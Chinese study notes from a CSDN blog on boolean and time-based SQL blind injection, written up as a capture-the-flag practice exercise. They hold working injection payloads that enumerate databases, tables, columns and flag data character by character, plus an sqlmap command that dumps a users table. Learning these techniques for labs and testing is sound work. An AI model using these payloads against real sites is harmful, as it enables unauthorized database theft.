7月11日总结

sql注入之盲注_sql盲注-CSDN博客

二、布尔盲注

1、定义

web页面只返回True,False两种值。利用页面返回不同,逐个猜解数据

2、条件
  • 没有返回SQL执行的错误信息
  • 错误与正确的输入,返回的结果只有两种

通过脚本修改URL,payload,if语句

查出字段名(查库,查表,查数据同理)

三、时间盲注

1、定义

web页面只返回一个正常页面。利用页面响应时间不同,逐个猜解数据

2、条件
  • 页面上没有显示位和SQL语句执行的错误信息
  • 正确执行和错误执行的返回界面一样

1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1)) > %d--

电脑目前脚本路径

F:\python\jiaoben

布尔注入题目练习

通过测试发现改题目为数字注入

通过脚本,查库

1 and ascii(substr((select database()),%d,1)) > %d-- 

查所有库名(有点多余)

1 and ascii(substr((select group_concat(schema_name) from information_schema.schemata),%d,1)) > %d--

查表

news和flag

1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),%d,1)) > %d--

查字段

1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'),%d,1)) > %d--

查数据

1 and ascii(substr((select group_concat(flag) from sqli.flag),%d,1)) > %d--

SQLmap使用教程图文教程(超详细)-CSDN博客

sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username' --dump


-u接URL
-D接库名
-T接表名
-C接字段名

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值